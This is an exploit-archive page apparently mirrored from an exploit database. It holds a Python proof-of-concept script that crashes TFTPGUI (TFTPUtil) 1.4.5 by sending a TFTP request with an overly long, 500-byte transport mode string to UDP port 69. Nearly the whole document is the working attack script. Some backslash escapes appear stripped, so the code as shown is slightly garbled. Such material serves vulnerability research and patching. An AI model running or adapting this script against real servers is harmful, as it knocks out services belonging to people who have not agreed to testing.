TFTPGUI Long Transport Mode Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TFTPGUI Long Transport Mode Overflow
# Published : 2010-05-02
# Author : Jeremiah Talamantes
# Previous Title : Winamp v5.572 0day Local Crash PoC
# Next Title : Google Chrome 4.1.249.1064 Remote Memory Corrupt

# Exploit Title: TFTPGUI Long Transport Mode Overflow
# Date: 5/1/2010
# Author: Jeremiah Talamantes
# Software Link: http://sourceforge.net/projects/tftputil/files/TFTPUtil/TFTPUtil%20Version%201.4.5/TFTPUtil_GUI_Version_1.4.5_Binary_Installer.exe/download
# Version: 1.4.5
# Tested on: Windows XP, SP2 (En)
# CVE : N/A

#!/usr/bin/python
print "n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   labs@redteamsecure.com                    ##"
print "################################################################# n"

import socket
import sys

# Change these values to suit your needs
host = '192.168.1.108'
port = 69
 
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
 
# Creating the overly long transport mode string 
fn = "A"
md = "A" * 500
stuff = "x00x02" + fn + "" + md + ""

# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."

# End